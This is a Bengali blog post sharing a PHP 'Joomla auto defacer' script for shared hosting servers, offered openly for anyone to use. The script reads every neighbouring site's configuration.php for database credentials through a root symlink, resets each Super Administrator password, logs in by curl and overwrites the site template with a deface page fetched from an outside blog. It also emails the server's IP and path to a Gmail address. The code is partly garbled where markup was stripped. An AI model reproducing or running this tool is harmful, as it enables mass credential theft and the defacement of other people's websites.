joomla auto defacer

0
374
joomla auto defacer

নাদিম জোবায়ের

যাহারা আমাকে চিনেন সেটা ভাল না চিনলে আরও ভাল :P
joomla auto defacer

অনেক দিন আগে আমাদের তেরক ভাই একটা স্ক্রিপ্ট বানাইছিল :) joomla auto defacer দিয়া দিলাম সবার জন্য ।


<?
//joomla auto defacer
//coded by Force Ex

Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting

ini_set("display_errors", "0");
set_time_limit(0);
@session_start();
echo "

AUTOMATIC JOOMLA DEFACER

";
echo "

CODED BY : ECF

";
echo "

ECF

";
echo "

http://blog.ecf.me

";
//mail feature
$body=("server ip:".$_SERVER['SERVER_ADDR']." "."Site Name:".$_SERVER['SERVER_NAME']." "."Directory".dirname(__FILE__));
mail('nadimzobaer@gmail.com',$_SERVER['SERVER_ADDR'],$body);

$base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']);

//create symlink of / to /ecf/root/
@mkdir('ecf',0777);
$wr = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
$fp = @fopen ('ecf/.htaccess','w');
fwrite($fp, $wr);
@symlink('/','ecf/root');
//collecting site names
$text=file_get_contents($base_url.'/ecf/root/var/named/');
$ar = explode('

  • <a href="', $text);
    for($vi=2;$vi < count($ar);$vi++)
    {
    $var1 = strtok($ar[$vi], " ");
    $var1 = substr($var1,0,-2);
    $old=('.db');
    $new=('');
    $sites = str_replace($old , $new , $var1);
    $filename = 'sites.txt';
    $fp = fopen($filename, "a+");
    $write = fputs($fp, $sites."\n");
    fclose($fp);
    }

    //collecting domainuser names for sites
    $domainusers=file('sites.txt');
    foreach ($domainusers as $domainuser) {
    $textexec=("ls -la /etc/valiases/".$domainuser);
    $exec=exec($textexec);
    $filename = 'lsla.txt';
    $fp = fopen($filename, "a+");
    $write = fputs($fp, $exec."\n");
    fclose($fp);
    }

    //creating final domain and domain user list
    $lsla=file('lsla.txt');
    foreach ($lsla as $finaldom) {
    $user=entre2v2($finaldom,"-rw-r----- 1 "," mail");
    $site=substr(strstr($finaldom, '/etc/valiases'),14);

    $filename = 'bhung.txt';
    $fp = fopen($filename, "a+");
    $write = fputs($fp, $user.":". $site." ");
    fclose($fp);

    }

    $f=file_get_contents('bhung.txt');
    $finals=explode(" ",$f);
    foreach ($finals as $final){
    $strlen=('6');
    $dr=strlen ($final);
    if ($dr < $strlen) {

    $filename = 'faltu.txt';
    $fp = fopen($filename, "a");
    $write = fputs($fp, $final);
    fclose($fp);
    }
    else {
    $filename = 'gold.txt';
    $fp = fopen($filename, "a");
    $write = fputs($fp, $final."\n");
    fclose($fp);
    }

    }
    //delete ajaira text files
    unlink ('bhung.txt');
    unlink ('faltu.txt');
    unlink ('lsla.txt');
    unlink ('sites.txt');

    $h=file_get_contents('http://blog.ecf.me');
    $url=($base_url);
    $a=file($base_url.'/gold.txt');
    echo ("

    ");

    foreach ($a as $final) {
    list($user, $site_url) = explode(":", $final);
    $site_urlto = substr($site_url, 0, -1);
    $url2=($url."/ecf/root/home/".$user."/public_html/configuration.php");
    $configs=file_get_contents($url2);
    $old=('$');
    $new=('ecf');
    $configfile = str_replace($old , $new , $configs);
    $username=entre2v2($configfile, "ecfuser = '","';");
    $password=entre2v2($configfile, "ecfpassword = '","';");
    $dbname=entre2v2($configfile, "ecfdb = '","';");
    $dbprefix=entre2v2($configfile, "ecfdbprefix = '","';");

    $strlendbprefix= strlen ($dbprefix);
    if ($strlendbprefix > 2) {
    $link=mysql_connect("localhost",$username,$password) ;

    mysql_select_db($dbname,$link) ;

    $tryChaningInfo = mysql_query("UPDATE ".$dbprefix."users SET username ='admin' , password = '44a0bcda611514625ba94e0b1c0bdaed:2iets9ydjR3iOdSuyvW54pIzyF9M1P5J' where usertype='Super Administrator'");

    //checking pass change
    $reqpass=('44a0bcda611514625ba94e0b1c0bdaed:2iets9ydjR3iOdSuyvW54pIzyF9M1P5J');
    $checkpass= mysql_query("SELECT password FROM ".$dbprefix."users where username='admin'");
    $showpass=mysql_fetch_array ($checkpass);
    if ($showpass[0]== $reqpass) {

    $filename = 'passchanged.txt';
    $fp = fopen($filename, "a+");
    $write = fputs($fp, $site_url."\n");
    fclose($fp);
    //upto this alright
    $req =mysql_query("SELECT * from `".$dbprefix."extensions` ");

    $co=randomt();

    if ( $req )
    {

    $req =mysql_query("SELECT * from `".$dbprefix."template_styles` WHERE client_id='0' and home='1'");
    $data = mysql_fetch_array($req);
    $template_name=$data["template"];

    $req =mysql_query("SELECT * from `".$dbprefix."extensions` WHERE name='".$template_name."'");
    $data = mysql_fetch_array($req);
    $template_id=$data["extension_id"];

    $urlto=$site_urlto."/administrator/index.php";

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $urlto);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);

    $buffer = curl_exec($ch);

    $return=entre2v2($buffer ,'<input type="hidden" name="return" value="','"');
    $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);

    ///////////////////////////
    $urlto=$site_urlto."/administrator/index.php";
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $urlto);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=1&option=com_login&task=login&return=".$return."&".$hidden."=1");
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
    $buffer = curl_exec($ch);

    $pos = strpos($buffer,"com_config");
    if($pos === false) {

    }
    else {
    }
    ///////////////////////////
    $urlto=$site_urlto."/administrator/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $urlto);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
    $buffer = curl_exec($ch);

    $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);
    if($hidden2) {
    }
    else {

    }
    $urlto=$site_urlto."/administrator/index.php?option=com_templates&layout=edit";

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $urlto);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$h."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");

    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
    $buffer = curl_exec($ch);

    $pos = strpos($buffer,'

    ');
    if($pos === false) {
    echo "
    Domain User Website Name CMS Status
    $user $site_url Joomla Failed

    ";
    }
    else {
    $deftempurl=("http://".$site_urlto."/templates/".$template_name."/index.php");
    $filename = 'deftemp.txt';
    $fp = fopen($filename, "a+");
    $write = fputs($fp, $deftempurl."\n");
    fclose($fp);

    echo "

    $user $site_url Joomla Defaced

    ";

    }

    }

    else
    {

    $req =mysql_query("SELECT * from `".$dbprefix."templates_menu` WHERE client_id='0'");
    $data = mysql_fetch_array($req);
    $template_name=$data["template"];

    $urlto=$site_urlto."/administrator/index.php";
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $urlto);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
    $buffer = curl_exec($ch);

    $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);

    $urlto=$site_urlto."/administrator/index.php";
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $urlto);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=1&option=com_login&task=login&".$hidden."=1");
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
    $buffer = curl_exec($ch);

    $pos = strpos($buffer,"com_config");

    if($pos === false) {

    }
    else {
    }
    $urlto=$site_urlto."/administrator/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $urlto);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
    $buffer = curl_exec($ch);

    $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);

    if($hidden2) {

    }
    else {

    }

    $urlto=$site_urlto."/administrator/index.php?option=com_templates&layout=edit";
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $urlto);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$h."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
    $buffer = curl_exec($ch);

    $pos = strpos($buffer,'

    ');
    if($pos === false) {
    echo "
    $user $site_url Joomla Failed

    ";
    }
    else {
    $deftempurl=("http://".$site_urlto."/templates/".$template_name."/index.php");
    $filename = 'deftemp.txt';
    $fp = fopen($filename, "a+");
    $write = fputs($fp, $deftempurl."\n");
    fclose($fp);

    echo "

    $user $site_url Joomla Defaced

    ";

    }

    }

    //upto this alright

    }
    else {
    }
    }
    else {
    }
    }

    $cntpasschanged=file('passchanged.txt');
    $countpasschanged= count ($cntpasschanged);

    echo("
    ");
    $defacedurl=('View List of Defaced Site
    ');
    $passchangedurl=('View List of Password Changed site
    ');
    echo "

    $defacedurl $passchangedurl

    ";

    //declaring function entre2v2
    function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
    $ar0=explode($marqueurDebutLien, $text);
    $ar1=explode($marqueurFinLien, $ar0[$i]);
    return trim($ar1[0]);
    }

    function randomt() {

    $chars = "abcdefghijkmnopqrstuvwxyz023456789";
    srand((double)microtime()*1000000);
    $i = 0;
    $pass = '' ;

    while ($i

  • pastebin লিংক

    http://pastebin.com/qT4RFAyh

    টিউনারপেজের নতুন টিউন আপনাকে ইমেইল করব?
    Unlimited Web Hosting
    Unlimited Web Hosting
    Unlimited Web Hosting
    Unlimited Web Hosting

    একটি উত্তর ত্যাগ

    Please enter your comment!
    Please enter your name here

    9 − 2 =